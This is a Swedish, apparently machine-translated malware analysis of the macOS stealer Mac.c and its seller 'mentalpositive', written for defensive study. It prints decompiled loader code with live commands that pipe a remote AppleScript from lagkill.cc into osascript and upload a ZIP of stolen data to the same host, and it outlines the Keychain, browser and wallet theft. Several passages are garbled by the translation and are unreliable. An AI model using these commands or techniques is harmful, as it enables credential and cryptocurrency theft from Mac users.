Historien om Mac.c-stjälen börjar inte med en stor kampanj eller inbrott. Det börjar i de trånga hörnen av darknet-forum, där en hotaktör som heter "mentalpositive" först dök upp, som drar uppmärksamhet med en uppsättning ovanliga egenskaper som skiljer honom från andra stjälarutvecklare. Vi kan redan se att det är en ny aktör som utnyttjar en macOS-marknad för skadlig kod som förblir mycket mindre mättad än sin Windows-motsvarare, vilket markerar uppkomsten av den nya vågen av hotaktörer som är både tekniskt skickliga och kommersiellt ambitiösa. MåneLock Även om Mac.c bara nyligen är aktivt, konkurrerar det redan med större, mer etablerade stöldoperationer som Medan den lånar tungt från AMOS och Eftersom fler webbadresser läggs till i sin kommando- och kontrollinfrastruktur verkar Mac.c vara en del av ett större underjordiskt ekosystem som riktar sig mot macOS-användare. Atomic Stealer för macOS Rodrig4 Det som också sticker ut är ett metodiskt och ovanligt öppet tillvägagångssätt för att bygga offentligt. "mentalpositiva" delade framstegsuppdateringar och till och med insamlad feedback på Mac.c builds - en överraskande nivå av öppenhet i den typiskt hemliga världen av macOS malwareutveckling. I den här artikeln spårar vi utvecklingen av Mac.c, unpack mentalpositive's taktik och undersöker hur denna tjuv passar in i det bredare landskapet av hot som riktar sig mot Apple-plattformar. En ny aktör på marknaden För ungefär fyra månader sedan märkte Moonlock Lab först uppkomsten av Mac.c-stöld och tillskrev den till en utvecklare under alias "mentalpositiva". I likhet med andra hotaktörer antar "mentalpositive" de senaste trenderna inom malwareutveckling: modulär arkitektur för användning över olika kampanjer, avancerade förtäckningstekniker och alltmer komplexa kommando-och-kontroll (C2) infrastrukturer. Den skördar dock iCloud Keychain-uppgifter, lösenord som lagras i webbläsaren, krypto-plånböcker, systemmetadata och till och med filer från specifika platser på macOS – allt med hjälp av uppgifter som erhållits genom phishing. Bygga offentligt Utöver den tekniska designen visade "mentalpositive" ovanligt beteende över darknet-forum.Under flera månader använde denna hotaktör ett underjordiskt forum för att visa upp incrementella uppdateringar till Mac.c, engagera sig med potentiella användare och aktivt söka feedback. Sådan publicitet kan signalera en avsikt att öka synligheten och rita ut en distinkt marknadsnärvaro.Det verkar också lägga grunden för en anpassad stealer-as-a-service affärsmodell som riktar sig uteslutande till macOS-hotnivån. Skärmdumparna nedan visar hur forumposterna utvecklades över tiden när nya funktioner tillkännagavs.Eftersom de ursprungliga posterna skrevs på ryska, har vi inkluderat en kort förklaring för var och en.Den första skärmdumpen visar en tidig annons som erbjuder en prenumeration på stjälkaruppdateringar för $1 500 per månad. Enligt dem inkluderade några av de mest anmärkningsvärda uppdateringarna: ersättning av den ursprungliga Ledger Live-appen, minskning av filens binära storlek (för en snabbare nedladdning och potentiellt mindre upptäckbara artefakter genom statisk analys) och optimering av administrationspanelen. I detta sammanhang avser en panel ett webbaserat gränssnitt för "mentalpositiva" kunder, köparna av Mac.c-stöld. Det gör det möjligt för dem att generera malware-byggnader, spåra infektioner (inklusive framgångsrika och misslyckade försök) och hantera andra kampanjdetaljer. Som tidigare nämnts uppdaterade "mentalpositive" ofta sin forumtråd för att hålla potentiella kunder engagerade genom att visa att utvecklingen pågår.Nedan är ett exempel på en sådan uppdatering, där hotaktören hävdar att ha testat den senaste versionen av tjuven mot macOS-versioner över 10.12.6. Tox och Jabber. telegram Och slutligen, det senaste inlägget vid tidpunkten för skrivandet skisserar ytterligare uppdateringar. Dessa inkluderar att kringgå XProtect genom att generera unika builds från grunden, en utökad lista över stödda webbläsare, fil grabber aktivering via kontrollpanelen, och mest anmärkningsvärt en separat modul för phishing Trezor fraser. Likheter med Amos Intressant nog har vissa utvecklare bakom konkurrerande tjuvar ifrågasatt originaliteten hos Mac.c-koden, vilket tyder på att det kan vara en modifierad version av den välkända Atomic macOS Stealer. Moonlock Lab analyserade och jämförde de senaste lönsamheterna för båda tjuvarna, och AMOS täcks i detalj i Medan de två delar delar identisk kod, är den funktionalitet som implementeras av "mentalpositive" betydligt mer begränsad. En av våra senaste artiklar (Uppmärksammat i röd färg) AMOS SHA256: 54b9576aad25d54d703adb9a26feaa5d80f44b94731ff8ecff7cf1ebc15cf3ff Första gången vi ses i vildmarken: 2025-06-19 20:18:55 ' (Uppmärksammat i grön färg) mentalpositive SHA256: 7dfd77f09a90d8d01a7d74a84685645622ae87a90b5dd72a5750daac9195c467 Första gången vi ses i vildmarken: 2025-07-01 15:41:49 En detaljerad inspektion avslöjar betydande återanvändning av kod på funktionell nivå mellan Mac.c och Atomic macOS Stealer. I flera fall verkar funktionerna ha kopierats verbalt eller med minimala förändringar, vilket antingen tyder på en delad utvecklingsursprung eller direkt kodlån. Funktionellt har båda tjuvarna en nästan identisk uppsättning funktioner som är utformade för omfattande datastöld på macOS-system. I båda fallen utförs dessa funktioner med hjälp av inbyggda macOS-verktyg och skript, vilket minimerar externa beroenden och förbättrar undvikande. Trots deras gemensamma interna, AMOS introducerar betydande framsteg i uthållighet, modularitet och inriktning. Medan Mac.c fungerar som en kompakt, icke-persistent AppleScript-baserad tjuv, representerar Atomic macOS Stealer ett mer avancerat, persistent och modulärt hot av samma designfilosofi. Den höga graden av återanvändning av kod väcker viktiga frågor om tilldelning, byggare tillgänglighet och potentiellt samarbete inom macOS malware utvecklingscirklar. Hur Mac.c Stealer fungerar har redan nämnts i Sedan dess har deras operativa domän inte förändrats: https://lagkill[.]cc. Den är värd för PHP-filer som används för att spåra offer och vissa exfiltreringsprocedurer. 'mentalpositive' Tidigare inlägg Moonlock Lab Denna domän har relationer till flera Mach-O-filer, men i allmänhet arbetsflödet kan sammanfattas i 2 steg: Mach-O initial körbar och AppleScript nyttolast. Steg 1: Mach-O initial utförbar Mac.c-stölden använder en flerstegsutförandestrategi, med sin första fas som fungerar som en lätt lastare som ansvarar för dold utplacering, miljösanisering och kontrollerad leverans av nästa nyttolast.Nedan är en detaljerad uppdelning av detta steg, baserat på omvänd teknik av provet 90309fc3b90df1d7b6d7d747c5afa63fca6262721ce39c34da4b13901d53b919a3. undefined8 entry(void) { pid_t pVar1; int res; char cmd [1024]; char id [56]; undefined7 url_C2; undefined4 uStack_29; long local_20; local_20 = *(long *)PTR____stack_chk_guard_100001008; pVar1 = _fork(); if (-1 < pVar1) { if (pVar1 != 0) { LAB_100000e59: if (*(long *)PTR____stack_chk_guard_100001008 == local_20) { return 0; } ___stack_chk_fail(); } pVar1 = _setsid(); if (-1 < pVar1) { _freopen("/dev/null","r",*(FILE **)PTR____stdinp_100001018); _freopen("/dev/null","w",*(FILE **)PTR____stdoutp_100001020); _freopen("/dev/null","w",*(FILE **)PTR____stderrp_100001010); /* SandBox protection */ _system("killall Terminal"); /* Create C2: lagkill.cc */ url_C2 = 0x6c6c696b67616c; uStack_29 = 0x63632e; builtin_strncpy(id + 0x20,"3f2ffd13c8",0xb); builtin_strncpy(id + 0x10,"592960231c11198d",0x10); builtin_strncpy(id,"17508488681a0237",0x10); /* Run upload and run applescript stealer logic: curl -s https://lagkill.cc/src.php?txd=17508488681a0237592960231c11198d3f2ffd13c8 | osascript */ _snprintf(cmd,0x400,"curl -s https://%s/src.php?txd=%s | osascript"); res = _system(cmd); if (res == 0) { /* Run upload to lagkill.cc*/ _snprintf(cmd,0x400, "curl -X POST -H \"cl: 0\" --max-time 300 -F \"file=@/tmp/osalogging.zip\" -F \"bu ildtxd=%s\" https://%s/" ,id,&url_C2); res = _system(cmd); if (res == 0) goto LAB_100000e59; } } } _exit(1); } Mac.c-ingångspunkten (entry()) börjar med att forka den aktuella processen och skapa en ny session via setsid(), effektivt demoniserar sig själv. Dessutom observerade vi grundläggande funktionalitet som omdirigerar alla standardinmatningar, utmatningar och felströmmar till /dev/null med hjälp av freopen(). Den hårdkodar kommando-och-kontroll (C2) domänen som: lagkill[.]cc. Den genererar också en unik offeridentifierare genom att sammanfoga flera statiska hexadecimalsträngar. Detta resulterar i en pseudo-unik txd token, som används för att fingeravtrycka den infekterade värden eller för att spåra infektionsbatcher under C2-kommunikation. Den viktigaste åtgärden i detta skede är att hämta och köra en fjärr AppleScript. Detta uppnås genom att kedja curl och osascript för att ladda ner och omedelbart köra nyttolasten: curl -s https://lagkill[.]cc/src.php?txd=<victim_id> | osascript Denna metod gör det möjligt för angriparen att uppdatera nyttolasten dynamiskt utan att modifiera lastaren, vilket gör tilldelning svårare på grund av den indirekta utförande vägen. Efter AppleScript-utförandet (vilket sannolikt utför lokalt data stöld) kontrollerar laddaren för framgång och fortsätter att exfiltrera ett ZIP-arkiv tillbaka till samma C2-server: curl -X POST -H "cl: 0" --max-time 300 -F "file=@/tmp/osalogging.zip" -F "buildtxd=<victim_id>" https://lagkill[.]cc/ Denna uppladdning skickas med anpassade rubriker (cl: 0) och en generös timeout för att rymma långsammare system, vilket tyder på noggrann uppmärksamhet på operativ stabilitet. Steg 2: AppleScript Payload Den andra etappen av Mac.c-stöld är där den verkliga skadan börjar. En AppleScript-nytta beväpnar inhemska macOS-skriptfunktioner för att extrahera ett brett spektrum av känsliga data. Anmärkningsvärt, det uppnår detta utan att släppa några kompilerade binärer eller kräver höga privilegier och ett phisherat lösenord är tillräckligt. Nedan delar vi upp taktiken för den andra etappen av lönsamhetsbelastningen efter kategori. Credential theft & CLI abuse Skriptet lanserar en falsk systemuppmaning som begär användarens lösenord. Detta lagras i plaintext och återanvänds senare. Senare åberopar den tyst säkerhets CLI-verktyget för att extrahera sparade credentials från Keychain, specifikt riktar sig till Google Chrome och Chromium-baserade appar. Data som hämtas skrivs till /tmp/<random>/Password. Denna phishing-taktik utnyttjar inhemskt förtroende och välbekanta macOS-gränssnitt för att kringgå användarskepticism. Browser and extensions data theft Targeted webbläsare inkluderar Chrome, Edge, Brave och Yandex. Utdragna filer inkluderar: inloggningsdata, cookies, webbdata, IndexedDB lagring. Slutligen itererar skriptet genom hundratals kända kryptovalutautvidgningar - som MetaMask, Phantom och Binance Wallet - och drar lokala lagringsfiler eller session artefakter. Alla webbläsarrelaterade loot är organiserade under /tmp/<random>/Browsers/. Hot wallet and crypto app harvesting Den lönsamhet skannar för närvaron av populära skrivbords kryptovalutor, inklusive: Elektriska Exodus Coinomi Atomiskt Monero Wasabi Ledger lever Relevanta data som plånbokfiler och konfigurationsdatabaser (t.ex. LevelDB-kataloger) kopieras till /tmp/<random>/Cryptowallets/. Detta indikerar en tydlig ekonomisk motivation, med inriktning skräddarsydd mot macOS crypto-entusiast användarbas. File-grabber and its logic För att maximera intelligensvärdet samtidigt som fotavtrycket minimeras gör skriptet följande: Recursivt söker användarens skrivbord, dokument och nedladdningar mappar. Filter för filtyper med hög värde: .wallet, .seed, .txt, .keys, .pdf, .docx. Begränsar filstorleken till ~10 MB. Detta tillvägagångssätt prioriterar lågt buller, höga signalfiler som inkluderar potentiella fraser, återställningsnycklar och känsliga PDF-filer. Collection of messaging and app artifacts Mac.c kopierar mapp tdata, som kan innehålla aktiva session tokens eller cachade meddelanden (de som är anslutna till Telegram). Konfigurationsfiler från Binance och Ton Keeper-appar kopieras också, vilket ger insikt i plånbokanvändning, inloggningsmönster eller lagrade nycklar. Typisk användning av system_profiler för att samla in data om hårdvara, macOS och display. Denna breda skanning föreslår en avsikt att rekonstruera användarens sammanhang, inte bara exfiltrera tillgångar. Archiving and exfiltration Alla data som samlas in är organiserade i en strukturerad tillfällig katalog /tmp/<random>/. Med ditto -c -k, macOS: s inbyggda arkiveringsverktyg, zippas hela katalogen till /tmp/osalogging.zip. Efter arkivering går nyttolasten ut. Det finns ingen bakgrundsövervakning eller upprepad utförande. Denna stealth-fokuserade, ephemeral design pekar på en snabb smash-and-grab-operation, sannolikt avsedd för engångsåtkomst eller som en del av en större infektionskedja. Phishing strategi En särskilt vilseledande teknik som används i "mentalpositive" andra stegets nyttolast involverar en falsk systemförfrågan förklädd som en spellicensförfrågan. Specifikt, Mac.c åberopar en inbyggd AppleScript-dialog som ber användaren att ange sitt macOS-inloggningslösenord för att "tillåta spelet för att rädda dina filer.” Oskyldiga häxor Dessutom kommer sådana lönsamheter med en build-tagg "oskyldig" (eller, i vissa fall, "oskyldig"), som förmodligen används för att identifiera infektioner kopplade till denna specifika kampanj. Slutligen är domänen som förmodligen hyrs ut specifikt för denna kampanj innocentwitches[.]top. Medan roten URL omdirigerar till Google, innehåller den också en /upload.php-rutten, vilket gör det möjligt för hotaktören att ta emot stulna data. slutsatser Eftersom Mac-datorer fortsätter att öka i popularitet bland genomsnittliga användare och kryptoinnehavare i synnerhet, förväntar vi oss att tjuvarna ska skala inte bara i sin förmåga, men i sin marknadsandel och inverkan. Mac.c är inte ett isolerat fall, utan en del av en växande trend mot professionell macOS-malwareutveckling. Medan den återanvänder viktiga funktioner och arkitektoniska element från den populära Atomic Stealer, ger den också nyhet i macOS-stöldare och sätter dem på en distinkt bana. Vad vi kan bevittna är framväxten av en ny affärsmodell: stealer-as-a-service, som riktar sig specifikt till macOS-användare och grenar ut från den bredare malware-as-a-service-industrin.Även om Atomic Stealer fortfarande är en farligare variant, kan det bara vara en tidsfråga när nya ambitiösa spelare använder sitt arv för att bygga en stöldigare och mer tillgänglig malware produkt. IOC https://innocentwitches[.]com/upload.php https://lagkill[.]cc/src.php 7dfd77f09a90d8d01a7d74a84a685645622ae87a90b5dd72a5750daac9195c467 33e9b605406ffb779dc912a1ce66436a8867b88e087bc34b2b2fca2160b64ca7 57b86903c46cf45c968aa9618c0a45eb135e05b24c13c0d27442d4387de37319 61f6b48e8433f6bf212c06157bead662f1833b72671b8f832ff3af032fdc4582